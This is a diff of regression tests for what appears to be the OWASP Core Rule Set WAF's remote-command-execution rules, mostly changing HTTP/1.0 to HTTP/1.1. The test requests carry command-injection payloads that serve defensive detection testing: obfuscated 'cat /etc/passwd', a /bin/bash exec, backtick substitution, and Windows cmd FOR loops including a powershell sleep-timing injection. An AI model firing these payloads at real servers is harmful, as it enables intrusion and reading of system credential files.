+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          uri: "/post"
+          data: "payload=Mi szép, mi édes azt szeretni a’ kinek kifolyása mind az a’ szép a’ mit itten látunk! ezt mondád, ’s mellyedre szorítál engemet, ’s könyűkre fakadtál; mi szép az, midőn tetteinknek mindeggyike megnyeri az azokat szemlélő Angyalok’ javalásaikat!"
+          version: "HTTP/1.1"
+        output:
+          log:
+            no_expect_ids: [932125]
+  - test_id: 6
+    desc: "Test for fp issue with ;si x"
+    stages:
+      - input:
+          dest_addr: "127.0.0.1"
+          method: "POST"
+          port: 80
+          headers:
+            User-Agent: "OWASP CRS test agent"
+            Host: "localhost"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          uri: "/post"
+          data: "payload=C’est simple: si les feux sont au vert sur la carrosserie, l’assistance peut intervenir sur un véhicule accidenté; si cela vire au rouge et qu’une alarme résonne, un danger électrique haute tension subsiste."
+          version: "HTTP/1.1"
+        output:
+          log:
+            no_expect_ids: [932125]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml
index 0fa006cd8..14fa28a4b 100755
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml
@@ -113,7 +113,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=0.84622338492032948`echo${IFS}crs312``echo${IFS}34test`"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932130]
@@ -130,7 +130,7 @@ tests:
           port: 80
           # cat /etc/pa[s]swd
           uri: "/get?cmd=cat%20/etc/pa%5Bs%5Dswd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932130]
@@ -147,7 +147,7 @@ tests:
           port: 80
           # cat /[?]tc/pa[?]swd
           uri: "/get?cmd=cat%20/%5B%3F%5Dtc/pa%5B%3F%5Dswd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932130]
@@ -164,7 +164,7 @@ tests:
           port: 80
           # hello [text in brackets]
           uri: "/get?cmd=hello%20%5Btext%20in%20brackets%5D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932130]
@@ -180,7 +180,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?s=/etc/pas[s]wd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932130]
@@ -196,7 +196,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?s=/etc/%5Bp%5Dasswd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932130]
@@ -212,7 +212,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?s=/etc/%5B!q%5Dasswd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932130]
@@ -228,7 +228,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?s=/etc/%5Bm-z%5Dasswd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932130]
@@ -244,7 +244,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?s=/usr/bin/%5Bu%5Dname+-a"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932130]
@@ -260,7 +260,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?exec=/bi%5Bn%5D/bash"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932130]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml
index e38f63c71..4a191fb6a 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml
@@ -16,7 +16,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=for%20%25variable%20in%20%28set%29%20do%20command"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -32,7 +32,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=for%20%25%25variable%20in%20%28set%29%20do%20command"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -48,7 +48,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=for%20%2fd%20%25variable%20in%20%28set%29%20do%20command"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -64,7 +64,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=for%20%2fr%20c%3a%5c%20%25variable%20in%20%28set%29%20do%20command"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -80,7 +80,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=for%20%2fl%20%25variable%20in%20%281%2c1%2c2%29%20do%20command"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -96,7 +96,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28fileset%29%20do%20command"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -112,7 +112,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28%22string%22%29%20do%20command"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -128,7 +128,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28%27command%27%29%20do%20command"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -144,7 +144,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=for%20%2ff%20%22usebackq%22%20%25variable%20in%20%28%60command%60%29%20do%20command"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -160,7 +160,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%7Cfor+%2Ff+%22delims%3D%22+%25i+in+%28%27cmd+%2Fc+%22powershell.exe+-InputFormat+none+write+%27FJQPVY%27.length%22%27%29+do+if+%25i%3D%3D6+%28cmd+%2Fc+%22powershell.exe+-InputFormat+none+Start-Sleep+-s+2%22%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -176,7 +176,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR++++++++++++++%25a+IN+%28set%29+DO+abc"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -192,7 +192,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR+%2FD+++++++++++%25a+IN+%28dirs%29+DO+abc"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -208,7 +208,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR+%2FD+%2FD++++++++%25a+IN+%28dirs%29+DO+abc"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -224,7 +224,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR+%2FF+%22options%22+%25a+IN+%28text%29+DO+abc"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -240,7 +240,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR+%2FF+%22options%22+%25a+IN+%28%22text%22%29+DO+abc"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -256,7 +256,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR+%2FL+++++++++++%25a+IN+%28start%2Cstep%2Cend%29+DO+abc"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -272,7 +272,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR+%2FL+%2FL+%2FL+++++%25a+IN+%28start%2Cstep%2Cend%29+DO+abc"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -288,7 +288,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR+%2FR+C%3A%5Cbla++++%25A+IN+%28set%29+DO+abc"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -304,7 +304,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%26+for+%25a+in+%28a%2Cb%2Cc%29+do+cmd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -320,7 +320,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%26+FOR+%25%25a+IN+%28a%2Cb%2Cc%29+DO+cmd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -336,7 +336,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%26+FOR+%25_+IN+%28a%2Cb%2Cc%29+DO+cmd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -352,7 +352,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%26+FOR+%252+IN+%28a%2Cb%2Cc%29+DO+cmd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -368,7 +368,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%26+FOR+%25-+IN+%28a%2Cb%2Cc%29+DO+cmd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -384,7 +384,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%26+FOR+%25%2F+IN+%28a%2Cb%2Cc%29+DO+cmd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -400,7 +400,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%26+FOR+%25%40+IN+%28a%2Cb%2Cc%29DO+cmd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -416,7 +416,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%26+FOR+%25%5B+IN+%28a%2Cb%2Cc%29DO+cmd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -432,7 +432,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%26+FOR+%25%5D+IN+%28a%2Cb%2Cc%29DO+cmd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -448,7 +448,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%26+FOR+%25%7E+IN+%28a%2Cb%2Cc%29DO+cmd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -464,7 +464,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%26+FOR+%2FF+%22tokens%3D1-3%22+%25A+IN+%28%22jejeje+brbr%22%29+DO+%40echo+pwnd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -480,7 +480,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%26+FOR+%2FF+%22tokens%3D1-3%22+%25%25A+IN+++%28%22jejeje+brbr%22%29+DO+%40echo+pwnd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -496,7 +496,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25G+IN+%28%27SET%27%29+DO+%40Echo+%25G"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -512,7 +512,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25G+IN+++%28%27ECHO+foo%27%29DO+%40Echo+%25G"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -528,7 +528,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25%7E+IN+++%28%27ECHO+foo%27%29DO+%40Echo+%25G"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -544,7 +544,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=For+%2FR+C%3A%5Ctemp%5C+%25G+IN+%28%2A.bak%29+do+Echo+del+%22%25G%22"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -560,7 +560,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=For+%2FR+C%3A%5Ctemp%5C+%25%25G+IN+%28%2A.bak%29+do+Echo+del+%22%25%25G%22"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -576,7 +576,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR+%2Ff+%22tokens%3D%2A%22+%25G+IN+%28%27dir+%2Fb%27%29+DO+%28call+%3Asubroutine+%22%25G%22%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -592,7 +592,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR+%2Ff+%22tokens%3D%2A%22+%25%25G+IN+%28%27dir+%2Fb%27%29+DO+%28call+%3Asubroutine+%22%25%25G%22%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -608,7 +608,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR+%2FF+%22tokens%3D1-5%22+%25A+IN+%28%22This+is+a+short+sentence%22%29+DO+%40echo+%25A+%25B+%25D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -624,7 +624,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR+%2FF+%22tokens%3D1-5%22+%25%25A+IN+%28%22This+is+a+short+sentence%22%29+DO+%40echo+%25%25A+%25%25B+%25%25D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -640,7 +640,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR+%25G+IN+%28a%2Cb%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%2Cj%2Ck%2Cl%2Cm%2Cn%2Co%2Cp%2Cq%2Cr%2Cs%2Ct%2Cu%2Cv%2Cw%2Cx%2Cy%2Cz%29+DO+%28md+C%3A%5Cdemo%5C%25G%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -656,7 +656,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR+%25%25G+IN+%28a%2Cb%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%2Cj%2Ck%2Cl%2Cm%2Cn%2Co%2Cp%2Cq%2Cr%2Cs%2Ct%2Cu%2Cv%2Cw%2Cx%2Cy%2Cz%29+DO+%28md+C%3A%5Cdemo%5C%25%25G%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -672,7 +672,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR+%2FL+%25G+IN+%281%2C1%2C5%29+DO+echo+%25G"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -688,7 +688,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR+%2FL+%25%25G+IN+%281%2C1%2C5%29+DO+echo+%25%25G"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -704,7 +704,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR+%25G+IN+%28Sun+Mon+Tue+Wed+Thur+Fri+Sat%29+DO+echo+%25G"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -720,7 +720,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR+%25%25G+IN+%28Sun+Mon+Tue+Wed+Thur+Fri+Sat%29+DO+echo+%25%25G"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -736,7 +736,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=for+%2Ff+%22tokens%3D%2A%22+%25G+in+%28%27dir+%2Fb+%2Fs+%2Fa%3Ad+%22C%3A%5CWork%5Creports%2A%22%27%29+do+echo+Found+%25G"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -752,7 +752,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=for+%2Ff+%22tokens%3D%2A%22+%25%25G+in+%28%27dir+%2Fb+%2Fs+%2Fa%3Ad+%22C%3A%5CWork%5Creports%2A%22%27%29+do+echo+Found+%25%25G"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -768,7 +768,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR+%2FD+%2Fr+%25G+in+%28%22User%2A%22%29+DO+Echo+We+found+%25G"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -784,7 +784,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C3+delims%3D%2C%22+%25%25G+IN+%28weather.txt%29+DO+%40echo+%25%25G+%25%25H"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -800,7 +800,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR+%2FF+%22tokens%3D4+delims%3D%2C%22+%25%25G+IN+%28%22deposit%2C%244500%2C123.4%2C12-AUG-09%22%29+DO+%40echo+Date+paid+%25%25G"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -816,7 +816,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR+%2FF+%25G+IN+%28%27%22C%3A%5Cprogram+Files%5Ccommand.exe%22%27%29+DO+ECHO+%25G"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -832,7 +832,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR+%2FF+%25%25G+IN+%28%27%22C%3A%5Cprogram+Files%5Ccommand.exe%22%27%29+DO+ECHO+%25%25G"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -848,7 +848,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25+IN+%28C%3A%5CMyDocu%7E1%5Cmytex%7E1.txt%29+DO+ECHO+%25%25"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -864,7 +864,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25G+IN+%28C%3A%5CMyDocu%7E1%5Cmytex%7E1.txt%29+DO+ECHO+%25%25G"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -880,7 +880,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR+%2FF+%22usebackq+tokens%3D1%2C2%2A+delims%3D%2C%22+%25G+IN+%28%22C%3A%5CMy+Documents%5Cmy+textfile.txt%22%29+DO+ECHO+%25G"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -896,7 +896,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=FOR+%2FF+%22usebackq+tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25G+IN+%28%22C%3A%5CMy+Documents%5Cmy+textfile.txt%22%29+DO+ECHO+%25%25G"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -912,7 +912,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%26+for+%2Ff+%5C%22delims%3D%5C%22+%25i+in+%28%27cmd+%2Fc+%5C%22set+%2Fa+%2863%2B21%29%5C%22%27%29+do+%40set+%2Fp+%3D+PDVQIS%25iPDVQISPDVQIS%3C+nul"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -928,7 +928,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=%3Bfor+%2Ff+%5C%22delims%3D%5C%22+%25i+in+%28%27cmd+%2Fc+%5C%22set+%2Fa+%2835%2B66%29%5C%22%27%29+do+%40set+%2Fp+%3D+LZEUZE%25iLZEUZELZEUZE%3C+nul%27"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -944,7 +944,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=for+%2Ff+%22tokens%3D%2A+delims%3D0%22+%25%25A+in+%28%22%25n1%25%22%29+do+set+%22n1%3D%25%25A%22"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -960,7 +960,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=for+%25i+in+%28%2A%29+do+set+LIST%3D+%25i"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -976,7 +976,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=for+%25i+in+%28%2A%29+do+set+LIST%3D%21LIST%21+%25i"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -992,7 +992,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=for+%2Fl+%25%25I+in+%280%2C1%2C5%29+do+call+echo+%25%25RANDOM%25%25"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1008,7 +1008,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=for+%25%25d+in+%28A%2CC%2CD%29+do+DIR+%25%25d+%2A.%2A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1024,7 +1024,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=for+%25%25f+in+%28%2A.TXT+%2A.BAT+%2A.DOC%29+do+TYPE+%25%25f"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1040,7 +1040,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=for+%25%25P+in+%28%25PATH%25%29+do+if+exist+%25%25P%5C%2A.BAT+COPY+%25%25P%5C%2A.BAT+C%3A%5CBAT"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1056,7 +1056,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++++++EXIST+filename.txt+++++%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1072,7 +1072,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++++++EXIST+filename+++++++++CMD"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1088,7 +1088,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++++++EXIST+filename+++++++++%28CMD%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1104,7 +1104,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++++++EXIST+data.xls+++++++++Echo+The+file+was+found."
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1120,7 +1120,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++++++EXIST+MyFile.txt+++++++%28ECHO+Some%5Bmore%5DPotatoes%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1136,7 +1136,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++++++EXIST+C%3A%5Cpagefile.sys++CMD"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1152,7 +1152,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++++++EXIST+C%3A%5Cpagefile.sys++%28CMD%29+ELSE+%28CMD%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1168,7 +1168,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++NOT+EXIST+C%3A%5Cnonexistent+++CMD"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1184,7 +1184,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF+%2FI+NOT+EXIST+C%3A%5Cnonexistent+++echo+hey"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1200,7 +1200,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF+++%2FI+++NOT+++EXIST+++C%3A%5Cnonexistent+++echo+hey"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1216,7 +1216,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++NOT+EXIST+C%3A%5Cnonexistent+++%28CMD%29+ELSE+%28CMD%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1232,7 +1232,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++NOT+EXIST+%28C%3A%5Cnonexistent%29+ECHO+pwnt"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1248,7 +1248,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++++++DEFINED+variable+++++++CMD"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1264,7 +1264,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++NOT+DEFINED+_example+++++++ECHO+Value+Missing"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1280,7 +1280,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++++++ERRORLEVEL+0+++++++++++CMD"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1296,7 +1296,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++NOT+ERRORLEVEL+0+++++++++++CMD"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1312,7 +1312,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++++++CMDEXTVERSION+1++++++++GOTO+start_process"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1328,7 +1328,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++++++2++++++++++++GEQ+15++++echo+%22bigger%22"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1344,7 +1344,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++++++%222%22++++++++++GEQ+%2215%22++echo+%22bigger%22"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1360,7 +1360,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+EQU+2+++++goto+sub_problem2"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1376,7 +1376,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+NEQ+0+++++echo+test"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1392,7 +1392,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+LEQ+2+++++echo+test"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1408,7 +1408,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+GTR+2+++++echo+test"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1424,7 +1424,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+GEQ+2+++++echo+test"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932140]
@@ -1440,7 +1440,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?foo=IF++++++++%25VARIABLE%25+++GTR+0+++++Echo+An+error+was+found"
-          version: HTTP/1.0
